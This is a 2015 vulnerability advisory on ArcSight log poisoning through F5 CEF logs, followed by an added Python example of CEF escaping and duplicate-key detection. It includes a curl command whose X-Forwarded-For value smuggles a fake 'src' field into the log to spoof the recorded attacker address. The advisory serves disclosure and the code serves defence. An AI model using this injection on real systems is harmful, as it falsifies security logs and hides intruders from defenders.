ArcSight suffers from a log poisoning vulnerability.
Exploit Title: ArcSight Log Poisoning on F5 CEF log
Date: Jun 25th 2015
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Video: https://www.youtube.com/watch?v=SgFHt37p_Lw
Description:
------------
An attacker can change the attacker address value shown in an ArcSight report
by poisoning the F5 log. The attacker requests a page with a "malicious
header" whose value replaces the content of the "src" CEF parameter.
Exploit:
--------
By triggering an F5 ASM rule, you can inject the "src" parameter through the
value of the X-Forwarded-For header:
curl -v -H "X-Forwarded-For: 127.0.0.1 src=8.8.8.8 cs6=" "http://<dest ip>/cmd.exe"
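
The following is an added example, not part of the original advisory or of any F5 or ArcSight code. It shows why the header value above yields a second "src" key when it is written into a CEF extension unescaped, and three defensive checks: escaping "=" and "\" in extension values, flagging duplicate keys, and validating the header as a list of IP addresses. The field layout (cs5 carrying the header, the cs6 fields, the client address 203.0.113.7) is constructed for illustration.

```python
import ipaddress
import re
from collections import Counter

KEY = re.compile(r"(?:^|(?<=\s))(\w+)=")   # start of a key; an escaped "\=" never matches

def escape_cef_value(value):
    """Escape an extension value the way CEF expects: backslash, '=', newlines."""
    value = value.replace("\\", "\\\\").replace("=", "\\=")
    return value.replace("\r", "\\r").replace("\n", "\\n")

def parse_extension(ext):
    """Return (key, value) pairs in order, keeping duplicate keys visible."""
    hits = list(KEY.finditer(ext))
    pairs = []
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(ext)
        raw = ext[m.end():end].strip()
        pairs.append((m.group(1), re.sub(r"\\([\\=])", r"\1", raw)))
    return pairs

def duplicate_keys(pairs):
    """Keys that occur more than once: a sign of injected key=value text."""
    counts = Counter(k for k, _ in pairs)
    return sorted(k for k, n in counts.items() if n > 1)

def xff_is_clean(header):
    """True only if every comma-separated element is a bare IP address."""
    try:
        for part in header.split(","):
            ipaddress.ip_address(part.strip())
        return True
    except ValueError:
        return False

def build_extension(client_ip, xff, escape):
    # Constructed layout; which field really carries the header is an assumption.
    value = escape_cef_value(xff) if escape else xff
    return f"src={client_ip} cs5Label=xff cs5={value} cs6Label=geo cs6=IT"

XFF = "127.0.0.1 src=8.8.8.8 cs6="   # header value from the advisory

if __name__ == "__main__":
    for escape in (False, True):
        pairs = parse_extension(build_extension("203.0.113.7", XFF, escape))
        # dict() keeps the last value per key, as a "last one wins" consumer would
        print(escape, dict(pairs)["src"], duplicate_keys(pairs), xff_is_clean(XFF))
```
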
Video:
------
https://www.youtube.com/watch?v=SgFHt37p_Lw
--
Andrea (aka theMiddle) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin